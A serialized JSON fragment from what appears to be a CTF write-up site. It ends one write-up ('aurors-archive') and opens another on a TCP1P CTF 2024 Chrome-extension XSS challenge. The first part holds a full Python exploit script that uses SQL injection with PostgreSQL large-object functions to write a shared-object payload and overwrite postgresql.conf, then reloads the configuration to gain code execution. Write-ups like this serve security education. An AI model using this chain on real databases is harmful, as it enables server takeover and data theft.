RT>/table",{"type":33,"tag":128,"props":10336,"children":10337},{"style":676},[10338],{"type":38,"value":10313},{"type":33,"tag":128,"props":10340,"children":10341},{"class":130,"line":848},[10342,10347,10351],{"type":33,"tag":128,"props":10343,"children":10344},{"style":323},[10345],{"type":38,"value":10346},"headers 
",{"type":33,"tag":128,"props":10348,"children":10349},{"style":312},[10350],{"type":38,"value":315},{"type":33,"tag":128,"props":10352,"children":10353},{"style":312},[10354],{"type":38,"value":762},{"type":33,"tag":128,"props":10356,"children":10357},{"class":130,"line":976},[10358,10363,10368,10372,10376],{"type":33,"tag":128,"props":10359,"children":10360},{"style":676},[10361],{"type":38,"value":10362},"    '",{"type":33,"tag":128,"props":10364,"children":10365},{"style":140},[10366],{"type":38,"value":10367},"Cookie",{"type":33,"tag":128,"props":10369,"children":10370},{"style":676},[10371],{"type":38,"value":6040},{"type":33,"tag":128,"props":10373,"children":10374},{"style":312},[10375],{"type":38,"value":284},{"type":33,"tag":128,"props":10377,"children":10378},{"style":151},[10379],{"type":38,"value":10380}," SESSION_COOKIE\n",{"type":33,"tag":128,"props":10382,"children":10383},{"class":130,"line":988},[10384],{"type":33,"tag":128,"props":10385,"children":10386},{"style":312},[10387],{"type":38,"value":854},{"type":33,"tag":128,"props":10389,"children":10390},{"class":130,"line":1001},[10391],{"type":33,"tag":128,"props":10392,"children":10393},{"emptyLinePlaceholder":896},[10394],{"type":38,"value":899},{"type":33,"tag":128,"props":10396,"children":10397},{"class":130,"line":1014},[10398,10403,10408],{"type":33,"tag":128,"props":10399,"children":10400},{"style":300},[10401],{"type":38,"value":10402},"def",{"type":33,"tag":128,"props":10404,"children":10405},{"style":135},[10406],{"type":38,"value":10407}," 
get_randnum",{"type":33,"tag":128,"props":10409,"children":10410},{"style":312},[10411],{"type":38,"value":10412},"():\n",{"type":33,"tag":128,"props":10414,"children":10415},{"class":130,"line":1026},[10416,10420,10425,10429,10434,10438,10443,10447,10452,10456,10461],{"type":33,"tag":128,"props":10417,"children":10418},{"style":1576},[10419],{"type":38,"value":6810},{"type":33,"tag":128,"props":10421,"children":10422},{"style":323},[10423],{"type":38,"value":10424}," random",{"type":33,"tag":128,"props":10426,"children":10427},{"style":312},[10428],{"type":38,"value":215},{"type":33,"tag":128,"props":10430,"children":10431},{"style":323},[10432],{"type":38,"value":10433},"randint",{"type":33,"tag":128,"props":10435,"children":10436},{"style":312},[10437],{"type":38,"value":5566},{"type":33,"tag":128,"props":10439,"children":10440},{"style":523},[10441],{"type":38,"value":10442},"0",{"type":33,"tag":128,"props":10444,"children":10445},{"style":312},[10446],{"type":38,"value":5584},{"type":33,"tag":128,"props":10448,"children":10449},{"style":523},[10450],{"type":38,"value":10451}," 31337",{"type":33,"tag":128,"props":10453,"children":10454},{"style":300},[10455],{"type":38,"value":9683},{"type":33,"tag":128,"props":10457,"children":10458},{"style":523},[10459],{"type":38,"value":10460},"5",{"type":33,"tag":128,"props":10462,"children":10463},{"style":312},[10464],{"type":38,"value":2427},{"type":33,"tag":128,"props":10466,"children":10467},{"class":130,"line":1038},[10468],{"type":33,"tag":128,"props":10469,"children":10470},{"emptyLinePlaceholder":896},[10471],{"type":38,"value":899},{"type":33,"tag":128,"props":10473,"children":10474},{"class":130,"line":1051},[10475,10479,10484,10488,10493],{"type":33,"tag":128,"props":10476,"children":10477},{"style":300},[10478],{"type":38,"value":10402},{"type":33,"tag":128,"props":10480,"children":10481},{"style":135},[10482],{"type":38,"value":10483}," 
exec_payload",{"type":33,"tag":128,"props":10485,"children":10486},{"style":312},[10487],{"type":38,"value":5566},{"type":33,"tag":128,"props":10489,"children":10490},{"style":323},[10491],{"type":38,"value":10492},"sql",{"type":33,"tag":128,"props":10494,"children":10495},{"style":312},[10496],{"type":38,"value":10497},"):\n",{"type":33,"tag":128,"props":10499,"children":10500},{"class":130,"line":1063},[10501,10506,10510,10514,10518,10522,10526,10530,10535,10540,10545,10550,10554,10558,10562,10567],{"type":33,"tag":128,"props":10502,"children":10503},{"style":323},[10504],{"type":38,"value":10505},"    body ",{"type":33,"tag":128,"props":10507,"children":10508},{"style":312},[10509],{"type":38,"value":315},{"type":33,"tag":128,"props":10511,"children":10512},{"style":312},[10513],{"type":38,"value":5642},{"type":33,"tag":128,"props":10515,"children":10516},{"style":676},[10517],{"type":38,"value":669},{"type":33,"tag":128,"props":10519,"children":10520},{"style":140},[10521],{"type":38,"value":5725},{"type":33,"tag":128,"props":10523,"children":10524},{"style":676},[10525],{"type":38,"value":669},{"type":33,"tag":128,"props":10527,"children":10528},{"style":312},[10529],{"type":38,"value":284},{"type":33,"tag":128,"props":10531,"children":10532},{"style":300},[10533],{"type":38,"value":10534}," f",{"type":33,"tag":128,"props":10536,"children":10537},{"style":140},[10538],{"type":38,"value":10539},"\"users",{"type":33,"tag":128,"props":10541,"children":10542},{"style":151},[10543],{"type":38,"value":10544},"\\\"",{"type":33,"tag":128,"props":10546,"children":10547},{"style":140},[10548],{"type":38,"value":10549}," where 
1=(",{"type":33,"tag":128,"props":10551,"children":10552},{"style":151},[10553],{"type":38,"value":7246},{"type":33,"tag":128,"props":10555,"children":10556},{"style":323},[10557],{"type":38,"value":10492},{"type":33,"tag":128,"props":10559,"children":10560},{"style":151},[10561],{"type":38,"value":5730},{"type":33,"tag":128,"props":10563,"children":10564},{"style":140},[10565],{"type":38,"value":10566},")--\"",{"type":33,"tag":128,"props":10568,"children":10569},{"style":312},[10570],{"type":38,"value":854},{"type":33,"tag":128,"props":10572,"children":10573},{"class":130,"line":1076},[10574,10579,10583,10588,10592,10596,10600,10604,10608,10613,10617,10622,10626,10631,10635,10639],{"type":33,"tag":128,"props":10575,"children":10576},{"style":323},[10577],{"type":38,"value":10578},"    res ",{"type":33,"tag":128,"props":10580,"children":10581},{"style":312},[10582],{"type":38,"value":315},{"type":33,"tag":128,"props":10584,"children":10585},{"style":323},[10586],{"type":38,"value":10587}," requests",{"type":33,"tag":128,"props":10589,"children":10590},{"style":312},[10591],{"type":38,"value":215},{"type":33,"tag":128,"props":10593,"children":10594},{"style":323},[10595],{"type":38,"value":5561},{"type":33,"tag":128,"props":10597,"children":10598},{"style":312},[10599],{"type":38,"value":5566},{"type":33,"tag":128,"props":10601,"children":10602},{"style":151},[10603],{"type":38,"value":10321},{"type":33,"tag":128,"props":10605,"children":10606},{"style":312},[10607],{"type":38,"value":5584},{"type":33,"tag":128,"props":10609,"children":10610},{"style":306},[10611],{"type":38,"value":10612}," 
headers",{"type":33,"tag":128,"props":10614,"children":10615},{"style":312},[10616],{"type":38,"value":315},{"type":33,"tag":128,"props":10618,"children":10619},{"style":323},[10620],{"type":38,"value":10621},"headers",{"type":33,"tag":128,"props":10623,"children":10624},{"style":312},[10625],{"type":38,"value":5584},{"type":33,"tag":128,"props":10627,"children":10628},{"style":306},[10629],{"type":38,"value":10630}," json",{"type":33,"tag":128,"props":10632,"children":10633},{"style":312},[10634],{"type":38,"value":315},{"type":33,"tag":128,"props":10636,"children":10637},{"style":323},[10638],{"type":38,"value":5671},{"type":33,"tag":128,"props":10640,"children":10641},{"style":312},[10642],{"type":38,"value":2427},{"type":33,"tag":128,"props":10644,"children":10645},{"class":130,"line":1089},[10646,10651,10655,10660,10664,10669],{"type":33,"tag":128,"props":10647,"children":10648},{"style":437},[10649],{"type":38,"value":10650},"    print",{"type":33,"tag":128,"props":10652,"children":10653},{"style":312},[10654],{"type":38,"value":5566},{"type":33,"tag":128,"props":10656,"children":10657},{"style":323},[10658],{"type":38,"value":10659},"res",{"type":33,"tag":128,"props":10661,"children":10662},{"style":312},[10663],{"type":38,"value":215},{"type":33,"tag":128,"props":10665,"children":10666},{"style":323},[10667],{"type":38,"value":10668},"status_code",{"type":33,"tag":128,"props":10670,"children":10671},{"style":312},[10672],{"type":38,"value":2427},{"type":33,"tag":128,"props":10674,"children":10675},{"class":130,"line":1101},[10676],{"type":33,"tag":128,"props":10677,"children":10678},{"style":323},[10679],{"type":38,"value":10680},"    
\n",{"type":33,"tag":128,"props":10682,"children":10683},{"class":130,"line":1114},[10684],{"type":33,"tag":128,"props":10685,"children":10686},{"emptyLinePlaceholder":896},[10687],{"type":38,"value":899},{"type":33,"tag":128,"props":10689,"children":10690},{"class":130,"line":1127},[10691,10695,10700,10704,10709],{"type":33,"tag":128,"props":10692,"children":10693},{"style":300},[10694],{"type":38,"value":10402},{"type":33,"tag":128,"props":10696,"children":10697},{"style":135},[10698],{"type":38,"value":10699}," file_to_base64",{"type":33,"tag":128,"props":10701,"children":10702},{"style":312},[10703],{"type":38,"value":5566},{"type":33,"tag":128,"props":10705,"children":10706},{"style":323},[10707],{"type":38,"value":10708},"file_path",{"type":33,"tag":128,"props":10710,"children":10711},{"style":312},[10712],{"type":38,"value":10497},{"type":33,"tag":128,"props":10714,"children":10715},{"class":130,"line":1139},[10716,10721,10726,10730,10734,10738,10742,10747,10751,10755,10760,10764],{"type":33,"tag":128,"props":10717,"children":10718},{"style":1576},[10719],{"type":38,"value":10720},"    with",{"type":33,"tag":128,"props":10722,"children":10723},{"style":437},[10724],{"type":38,"value":10725}," 
open",{"type":33,"tag":128,"props":10727,"children":10728},{"style":312},[10729],{"type":38,"value":5566},{"type":33,"tag":128,"props":10731,"children":10732},{"style":323},[10733],{"type":38,"value":10708},{"type":33,"tag":128,"props":10735,"children":10736},{"style":312},[10737],{"type":38,"value":5584},{"type":33,"tag":128,"props":10739,"children":10740},{"style":676},[10741],{"type":38,"value":679},{"type":33,"tag":128,"props":10743,"children":10744},{"style":140},[10745],{"type":38,"value":10746},"rb",{"type":33,"tag":128,"props":10748,"children":10749},{"style":676},[10750],{"type":38,"value":669},{"type":33,"tag":128,"props":10752,"children":10753},{"style":312},[10754],{"type":38,"value":2966},{"type":33,"tag":128,"props":10756,"children":10757},{"style":1576},[10758],{"type":38,"value":10759}," as",{"type":33,"tag":128,"props":10761,"children":10762},{"style":306},[10763],{"type":38,"value":4930},{"type":33,"tag":128,"props":10765,"children":10766},{"style":312},[10767],{"type":38,"value":5318},{"type":33,"tag":128,"props":10769,"children":10770},{"class":130,"line":1152},[10771,10776,10780,10784,10788,10793,10797,10802,10806,10811,10816,10821,10825,10829,10834,10838],{"type":33,"tag":128,"props":10772,"children":10773},{"style":323},[10774],{"type":38,"value":10775},"        base64_encoded 
",{"type":33,"tag":128,"props":10777,"children":10778},{"style":312},[10779],{"type":38,"value":315},{"type":33,"tag":128,"props":10781,"children":10782},{"style":323},[10783],{"type":38,"value":10200},{"type":33,"tag":128,"props":10785,"children":10786},{"style":312},[10787],{"type":38,"value":215},{"type":33,"tag":128,"props":10789,"children":10790},{"style":323},[10791],{"type":38,"value":10792},"b64encode",{"type":33,"tag":128,"props":10794,"children":10795},{"style":312},[10796],{"type":38,"value":5566},{"type":33,"tag":128,"props":10798,"children":10799},{"style":306},[10800],{"type":38,"value":10801},"file",{"type":33,"tag":128,"props":10803,"children":10804},{"style":312},[10805],{"type":38,"value":215},{"type":33,"tag":128,"props":10807,"children":10808},{"style":323},[10809],{"type":38,"value":10810},"read",{"type":33,"tag":128,"props":10812,"children":10813},{"style":312},[10814],{"type":38,"value":10815},"()).",{"type":33,"tag":128,"props":10817,"children":10818},{"style":323},[10819],{"type":38,"value":10820},"decode",{"type":33,"tag":128,"props":10822,"children":10823},{"style":312},[10824],{"type":38,"value":5566},{"type":33,"tag":128,"props":10826,"children":10827},{"style":676},[10828],{"type":38,"value":669},{"type":33,"tag":128,"props":10830,"children":10831},{"style":140},[10832],{"type":38,"value":10833},"utf-8",{"type":33,"tag":128,"props":10835,"children":10836},{"style":676},[10837],{"type":38,"value":669},{"type":33,"tag":128,"props":10839,"children":10840},{"style":312},[10841],{"type":38,"value":2427},{"type":33,"tag":128,"props":10843,"children":10844},{"class":130,"line":1165},[10845,10849],{"type":33,"tag":128,"props":10846,"children":10847},{"style":1576},[10848],{"type":38,"value":6810},{"type":33,"tag":128,"props":10850,"children":10851},{"style":323},[10852],{"type":38,"value":10853}," 
base64_encoded\n",{"type":33,"tag":128,"props":10855,"children":10856},{"class":130,"line":1177},[10857],{"type":33,"tag":128,"props":10858,"children":10859},{"emptyLinePlaceholder":896},[10860],{"type":38,"value":899},{"type":33,"tag":128,"props":10862,"children":10863},{"class":130,"line":1189},[10864,10868,10873,10877,10881],{"type":33,"tag":128,"props":10865,"children":10866},{"style":300},[10867],{"type":38,"value":10402},{"type":33,"tag":128,"props":10869,"children":10870},{"style":135},[10871],{"type":38,"value":10872}," read_base64file",{"type":33,"tag":128,"props":10874,"children":10875},{"style":312},[10876],{"type":38,"value":5566},{"type":33,"tag":128,"props":10878,"children":10879},{"style":323},[10880],{"type":38,"value":10708},{"type":33,"tag":128,"props":10882,"children":10883},{"style":312},[10884],{"type":38,"value":10497},{"type":33,"tag":128,"props":10886,"children":10887},{"class":130,"line":1202},[10888,10892,10896,10900,10904,10908,10912,10917,10921,10925,10929,10933],{"type":33,"tag":128,"props":10889,"children":10890},{"style":1576},[10891],{"type":38,"value":10720},{"type":33,"tag":128,"props":10893,"children":10894},{"style":437},[10895],{"type":38,"value":10725},{"type":33,"tag":128,"props":10897,"children":10898},{"style":312},[10899],{"type":38,"value":5566},{"type":33,"tag":128,"props":10901,"children":10902},{"style":323},[10903],{"type":38,"value":10708},{"type":33,"tag":128,"props":10905,"children":10906},{"style":312},[10907],{"type":38,"value":5584},{"type":33,"tag":128,"props":10909,"children":10910},{"style":676},[10911],{"type":38,"value":679},{"type":33,"tag":128,"props":10913,"children":10914},{"style":140},[10915],{"type":38,"value":10916},"r",{"type":33,"tag":128,"props":10918,"children":10919},{"style":676},[10920],{"type":38,"value":669},{"type":33,"tag":128,"props":10922,"children":10923},{"style":312},[10924],{"type":38,"value":2966},{"type":33,"tag":128,"props":10926,"children":10927},{"style":1576},[10928],{"type":38,
"value":10759},{"type":33,"tag":128,"props":10930,"children":10931},{"style":306},[10932],{"type":38,"value":4930},{"type":33,"tag":128,"props":10934,"children":10935},{"style":312},[10936],{"type":38,"value":5318},{"type":33,"tag":128,"props":10938,"children":10939},{"class":130,"line":1214},[10940,10945,10949,10953,10957,10961],{"type":33,"tag":128,"props":10941,"children":10942},{"style":323},[10943],{"type":38,"value":10944},"        base64_content ",{"type":33,"tag":128,"props":10946,"children":10947},{"style":312},[10948],{"type":38,"value":315},{"type":33,"tag":128,"props":10950,"children":10951},{"style":306},[10952],{"type":38,"value":4930},{"type":33,"tag":128,"props":10954,"children":10955},{"style":312},[10956],{"type":38,"value":215},{"type":33,"tag":128,"props":10958,"children":10959},{"style":323},[10960],{"type":38,"value":10810},{"type":33,"tag":128,"props":10962,"children":10963},{"style":312},[10964],{"type":38,"value":7857},{"type":33,"tag":128,"props":10966,"children":10967},{"class":130,"line":1226},[10968,10972],{"type":33,"tag":128,"props":10969,"children":10970},{"style":1576},[10971],{"type":38,"value":6810},{"type":33,"tag":128,"props":10973,"children":10974},{"style":323},[10975],{"type":38,"value":10976}," base64_content\n",{"type":33,"tag":128,"props":10978,"children":10979},{"class":130,"line":1239},[10980],{"type":33,"tag":128,"props":10981,"children":10982},{"emptyLinePlaceholder":896},[10983],{"type":38,"value":899},{"type":33,"tag":128,"props":10985,"children":10986},{"class":130,"line":1251},[10987,10992,10997,11002,11006,11011,11015],{"type":33,"tag":128,"props":10988,"children":10989},{"style":1576},[10990],{"type":38,"value":10991},"if",{"type":33,"tag":128,"props":10993,"children":10994},{"style":437},[10995],{"type":38,"value":10996}," __name__",{"type":33,"tag":128,"props":10998,"children":10999},{"style":300},[11000],{"type":38,"value":11001}," 
==",{"type":33,"tag":128,"props":11003,"children":11004},{"style":676},[11005],{"type":38,"value":679},{"type":33,"tag":128,"props":11007,"children":11008},{"style":140},[11009],{"type":38,"value":11010},"__main__",{"type":33,"tag":128,"props":11012,"children":11013},{"style":676},[11014],{"type":38,"value":669},{"type":33,"tag":128,"props":11016,"children":11017},{"style":312},[11018],{"type":38,"value":5318},{"type":33,"tag":128,"props":11020,"children":11021},{"class":130,"line":1263},[11022],{"type":33,"tag":128,"props":11023,"children":11024},{"style":5541},[11025],{"type":38,"value":11026},"    # upload b64 so\n",{"type":33,"tag":128,"props":11028,"children":11029},{"class":130,"line":1276},[11030,11035,11039,11043,11047,11051,11056,11060],{"type":33,"tag":128,"props":11031,"children":11032},{"style":323},[11033],{"type":38,"value":11034},"    payload ",{"type":33,"tag":128,"props":11036,"children":11037},{"style":312},[11038],{"type":38,"value":315},{"type":33,"tag":128,"props":11040,"children":11041},{"style":323},[11042],{"type":38,"value":10872},{"type":33,"tag":128,"props":11044,"children":11045},{"style":312},[11046],{"type":38,"value":5566},{"type":33,"tag":128,"props":11048,"children":11049},{"style":676},[11050],{"type":38,"value":669},{"type":33,"tag":128,"props":11052,"children":11053},{"style":140},[11054],{"type":38,"value":11055},"payload.b64",{"type":33,"tag":128,"props":11057,"children":11058},{"style":676},[11059],{"type":38,"value":669},{"type":33,"tag":128,"props":11061,"children":11062},{"style":312},[11063],{"type":38,"value":2427},{"type":33,"tag":128,"props":11065,"children":11066},{"class":130,"line":1288},[11067,11072,11076,11080],{"type":33,"tag":128,"props":11068,"children":11069},{"style":323},[11070],{"type":38,"value":11071},"    current_id 
",{"type":33,"tag":128,"props":11073,"children":11074},{"style":312},[11075],{"type":38,"value":315},{"type":33,"tag":128,"props":11077,"children":11078},{"style":323},[11079],{"type":38,"value":10407},{"type":33,"tag":128,"props":11081,"children":11082},{"style":312},[11083],{"type":38,"value":7857},{"type":33,"tag":128,"props":11085,"children":11086},{"class":130,"line":1300},[11087],{"type":33,"tag":128,"props":11088,"children":11089},{"style":323},[11090],{"type":38,"value":10680},{"type":33,"tag":128,"props":11092,"children":11093},{"class":130,"line":1313},[11094,11099,11103,11108,11113,11117,11122,11126,11131,11135,11140,11144,11149],{"type":33,"tag":128,"props":11095,"children":11096},{"style":323},[11097],{"type":38,"value":11098},"    exec_payload",{"type":33,"tag":128,"props":11100,"children":11101},{"style":312},[11102],{"type":38,"value":5566},{"type":33,"tag":128,"props":11104,"children":11105},{"style":300},[11106],{"type":38,"value":11107},"f",{"type":33,"tag":128,"props":11109,"children":11110},{"style":140},[11111],{"type":38,"value":11112},"\"SELECT lo_from_bytea(",{"type":33,"tag":128,"props":11114,"children":11115},{"style":151},[11116],{"type":38,"value":7246},{"type":33,"tag":128,"props":11118,"children":11119},{"style":323},[11120],{"type":38,"value":11121},"current_id",{"type":33,"tag":128,"props":11123,"children":11124},{"style":151},[11125],{"type":38,"value":5730},{"type":33,"tag":128,"props":11127,"children":11128},{"style":140},[11129],{"type":38,"value":11130},", decode('",{"type":33,"tag":128,"props":11132,"children":11133},{"style":151},[11134],{"type":38,"value":7246},{"type":33,"tag":128,"props":11136,"children":11137},{"style":323},[11138],{"type":38,"value":11139},"payload",{"type":33,"tag":128,"props":11141,"children":11142},{"style":151},[11143],{"type":38,"value":5730},{"type":33,"tag":128,"props":11145,"children":11146},{"style":140},[11147],{"type":38,"value":11148},"', 
'base64'))\"",{"type":33,"tag":128,"props":11150,"children":11151},{"style":312},[11152],{"type":38,"value":2427},{"type":33,"tag":128,"props":11154,"children":11155},{"class":130,"line":1327},[11156,11160,11164,11168,11173,11177,11181,11185,11190],{"type":33,"tag":128,"props":11157,"children":11158},{"style":323},[11159],{"type":38,"value":11098},{"type":33,"tag":128,"props":11161,"children":11162},{"style":312},[11163],{"type":38,"value":5566},{"type":33,"tag":128,"props":11165,"children":11166},{"style":300},[11167],{"type":38,"value":11107},{"type":33,"tag":128,"props":11169,"children":11170},{"style":140},[11171],{"type":38,"value":11172},"\"SELECT lo_export(",{"type":33,"tag":128,"props":11174,"children":11175},{"style":151},[11176],{"type":38,"value":7246},{"type":33,"tag":128,"props":11178,"children":11179},{"style":323},[11180],{"type":38,"value":11121},{"type":33,"tag":128,"props":11182,"children":11183},{"style":151},[11184],{"type":38,"value":5730},{"type":33,"tag":128,"props":11186,"children":11187},{"style":140},[11188],{"type":38,"value":11189},", '/tmp/payload.so')\"",{"type":33,"tag":128,"props":11191,"children":11192},{"style":312},[11193],{"type":38,"value":2427},{"type":33,"tag":128,"props":11195,"children":11197},{"class":130,"line":11196},38,[11198],{"type":33,"tag":128,"props":11199,"children":11200},{"emptyLinePlaceholder":896},[11201],{"type":38,"value":899},{"type":33,"tag":128,"props":11203,"children":11205},{"class":130,"line":11204},39,[11206],{"type":33,"tag":128,"props":11207,"children":11208},{"style":5541},[11209],{"type":38,"value":11210},"    # upload conf\n",{"type":33,"tag":128,"props":11212,"children":11214},{"class":130,"line":11213},40,[11215,11220,11224,11228,11232,11236,11240,11244],{"type":33,"tag":128,"props":11216,"children":11217},{"style":323},[11218],{"type":38,"value":11219},"    conf 
",{"type":33,"tag":128,"props":11221,"children":11222},{"style":312},[11223],{"type":38,"value":315},{"type":33,"tag":128,"props":11225,"children":11226},{"style":323},[11227],{"type":38,"value":10699},{"type":33,"tag":128,"props":11229,"children":11230},{"style":312},[11231],{"type":38,"value":5566},{"type":33,"tag":128,"props":11233,"children":11234},{"style":676},[11235],{"type":38,"value":669},{"type":33,"tag":128,"props":11237,"children":11238},{"style":140},[11239],{"type":38,"value":8945},{"type":33,"tag":128,"props":11241,"children":11242},{"style":676},[11243],{"type":38,"value":669},{"type":33,"tag":128,"props":11245,"children":11246},{"style":312},[11247],{"type":38,"value":2427},{"type":33,"tag":128,"props":11249,"children":11251},{"class":130,"line":11250},41,[11252,11256,11260,11264],{"type":33,"tag":128,"props":11253,"children":11254},{"style":323},[11255],{"type":38,"value":11071},{"type":33,"tag":128,"props":11257,"children":11258},{"style":312},[11259],{"type":38,"value":315},{"type":33,"tag":128,"props":11261,"children":11262},{"style":323},[11263],{"type":38,"value":10407},{"type":33,"tag":128,"props":11265,"children":11266},{"style":312},[11267],{"type":38,"value":7857},{"type":33,"tag":128,"props":11269,"children":11271},{"class":130,"line":11270},42,[11272],{"type":33,"tag":128,"props":11273,"children":11274},{"style":323},[11275],{"type":38,"value":10680},{"type":33,"tag":128,"props":11277,"children":11279},{"class":130,"line":11278},43,[11280,11284,11288,11292,11296,11300,11304,11308,11312,11316,11320,11324,11328],{"type":33,"tag":128,"props":11281,"children":11282},{"style":323},[11283],{"type":38,"value":11098},{"type":33,"tag":128,"props":11285,"children":11286},{"style":312},[11287],{"type":38,"value":5566},{"type":33,"tag":128,"props":11289,"children":11290},{"style":300},[11291],{"type":38,"value":11107},{"type":33,"tag":128,"props":11293,"children":11294},{"style":140},[11295],{"type":38,"value":11112},{"type":33,"tag":128,"props":112
97,"children":11298},{"style":151},[11299],{"type":38,"value":7246},{"type":33,"tag":128,"props":11301,"children":11302},{"style":323},[11303],{"type":38,"value":11121},{"type":33,"tag":128,"props":11305,"children":11306},{"style":151},[11307],{"type":38,"value":5730},{"type":33,"tag":128,"props":11309,"children":11310},{"style":140},[11311],{"type":38,"value":11130},{"type":33,"tag":128,"props":11313,"children":11314},{"style":151},[11315],{"type":38,"value":7246},{"type":33,"tag":128,"props":11317,"children":11318},{"style":323},[11319],{"type":38,"value":8945},{"type":33,"tag":128,"props":11321,"children":11322},{"style":151},[11323],{"type":38,"value":5730},{"type":33,"tag":128,"props":11325,"children":11326},{"style":140},[11327],{"type":38,"value":11148},{"type":33,"tag":128,"props":11329,"children":11330},{"style":312},[11331],{"type":38,"value":2427},{"type":33,"tag":128,"props":11333,"children":11335},{"class":130,"line":11334},44,[11336,11340,11344,11348,11352,11356,11360,11364,11369],{"type":33,"tag":128,"props":11337,"children":11338},{"style":323},[11339],{"type":38,"value":11098},{"type":33,"tag":128,"props":11341,"children":11342},{"style":312},[11343],{"type":38,"value":5566},{"type":33,"tag":128,"props":11345,"children":11346},{"style":300},[11347],{"type":38,"value":11107},{"type":33,"tag":128,"props":11349,"children":11350},{"style":140},[11351],{"type":38,"value":11172},{"type":33,"tag":128,"props":11353,"children":11354},{"style":151},[11355],{"type":38,"value":7246},{"type":33,"tag":128,"props":11357,"children":11358},{"style":323},[11359],{"type":38,"value":11121},{"type":33,"tag":128,"props":11361,"children":11362},{"style":151},[11363],{"type":38,"value":5730},{"type":33,"tag":128,"props":11365,"children":11366},{"style":140},[11367],{"type":38,"value":11368},", 
'/var/lib/postgresql/data/postgresql.conf')\"",{"type":33,"tag":128,"props":11370,"children":11371},{"style":312},[11372],{"type":38,"value":2427},{"type":33,"tag":128,"props":11374,"children":11376},{"class":130,"line":11375},45,[11377],{"type":33,"tag":128,"props":11378,"children":11379},{"emptyLinePlaceholder":896},[11380],{"type":38,"value":899},{"type":33,"tag":128,"props":11382,"children":11384},{"class":130,"line":11383},46,[11385],{"type":33,"tag":128,"props":11386,"children":11387},{"style":5541},[11388],{"type":38,"value":11389},"    # reload conf\n",{"type":33,"tag":128,"props":11391,"children":11393},{"class":130,"line":11392},47,[11394,11398,11402,11406,11411],{"type":33,"tag":128,"props":11395,"children":11396},{"style":323},[11397],{"type":38,"value":11098},{"type":33,"tag":128,"props":11399,"children":11400},{"style":312},[11401],{"type":38,"value":5566},{"type":33,"tag":128,"props":11403,"children":11404},{"style":300},[11405],{"type":38,"value":11107},{"type":33,"tag":128,"props":11407,"children":11408},{"style":140},[11409],{"type":38,"value":11410},"\"SELECT 
pg_reload_conf()\"",{"type":33,"tag":128,"props":11412,"children":11413},{"style":312},[11414],{"type":38,"value":2427},{"type":33,"tag":128,"props":11416,"children":11418},{"class":130,"line":11417},48,[11419,11423,11427,11431,11435],{"type":33,"tag":128,"props":11420,"children":11421},{"style":323},[11422],{"type":38,"value":11098},{"type":33,"tag":128,"props":11424,"children":11425},{"style":312},[11426],{"type":38,"value":5566},{"type":33,"tag":128,"props":11428,"children":11429},{"style":300},[11430],{"type":38,"value":11107},{"type":33,"tag":128,"props":11432,"children":11433},{"style":140},[11434],{"type":38,"value":11410},{"type":33,"tag":128,"props":11436,"children":11437},{"style":312},[11438],{"type":38,"value":2427},{"type":33,"tag":128,"props":11440,"children":11442},{"class":130,"line":11441},49,[11443,11447,11451,11455,11459],{"type":33,"tag":128,"props":11444,"children":11445},{"style":323},[11446],{"type":38,"value":11098},{"type":33,"tag":128,"props":11448,"children":11449},{"style":312},[11450],{"type":38,"value":5566},{"type":33,"tag":128,"props":11452,"children":11453},{"style":300},[11454],{"type":38,"value":11107},{"type":33,"tag":128,"props":11456,"children":11457},{"style":140},[11458],{"type":38,"value":11410},{"type":33,"tag":128,"props":11460,"children":11461},{"style":312},[11462],{"type":38,"value":2427},{"type":33,"tag":47,"props":11464,"children":11465},{},[11466,11468,11473],{"type":38,"value":11467},"Once the configuration is reloaded, we can retrieve the flag using the ",{"type":33,"tag":105,"props":11469,"children":11471},{"className":11470},[],[11472],{"type":38,"value":5294},{"type":38,"value":11474}," 
binary.",{"type":33,"tag":75,"props":11476,"children":11478},{"imgSrc":11477,":width":8617},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743113795/writeups/aurors-archive/read_flag.webp",[],{"type":33,"tag":5227,"props":11480,"children":11481},{},[11482],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":11484},[11485,11486,11487,11488],{"id":42,"depth":362,"text":45},{"id":5492,"depth":362,"text":5495},{"id":5910,"depth":362,"text":5913},{"id":8621,"depth":362,"text":8624},"content:writeups:aurors-archive.md","writeups/aurors-archive.md","writeups/aurors-archive",{"_path":11493,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":11494,"description":8,"head":11495,"body":11513,"_type":5240,"_id":22444,"_source":5242,"_file":22445,"_stem":22446,"_extension":5245},"/writeups/shikanoko","Shikanoko",{"title":11494,"description":11496,"keywords":11497,"slug":11498,"image":11499,"date":11500,"meta":11501},"Writeup of Shikanoko, a hard web challenge from TCP1P CTF 2024. 
It is about web extensions and XSS.","web,xss,chrome-extension","shikanoko","https://res.cloudinary.com/dmju5zuhr/image/upload/v1731244700/writeups/tcp1p_ctf.webp","2024-12-10",[11502,11503,11504,11505,11506,11508,11509,11511],{"og:image":11499},{"og:title":11494},{"og:description":11496},{"og:type":21},{"og:url":11507},"https://owalid.com/shikanoko",{"description":11496},{"title":11510},"Shikanoko writeup",{"keywords":11512},"web,xss,chrome-extension,tcp1p,ctf",{"type":30,"children":11514,"toc":22436},[11515,11519,11523,11528,11533,11538,11543,12020,12025,12030,12036,12048,12053,12059,12064,12069,12855,12898,12904,12909,12915,12920,12925,14474,14487,14505,14511,14516,14521,14527,14533,14538,14543,15371,15376,15382,15388,15407,15539,15565,16331,16373,17139,17152,17879,17884,17889,17905,19311,19316,19321,19326,19419,19424,19436,19455,20008,20029,20042,20046,20065,20069,20075,20080,20085,20829,20860,20865,20870,20882,20887,20892,21030,21034,21047,21051,21057,21062,21067,21313,21321,21869,21877,22423,22428,22432],{"type":33,"tag":34,"props":11516,"children":11517},{"id":11498},[11518],{"type":38,"value":11494},{"type":33,"tag":40,"props":11520,"children":11521},{"id":42},[11522],{"type":38,"value":45},{"type":33,"tag":47,"props":11524,"children":11525},{},[11526],{"type":38,"value":11527},"Shikanoko is a hard web challenge from TCP1P CTF 2024. The challenge is about web extensions and XSS.",{"type":33,"tag":47,"props":11529,"children":11530},{},[11531],{"type":38,"value":11532},"The goal of this challenge is to execute JavaScript in the bot's browser context in order to retrieve the flag. 
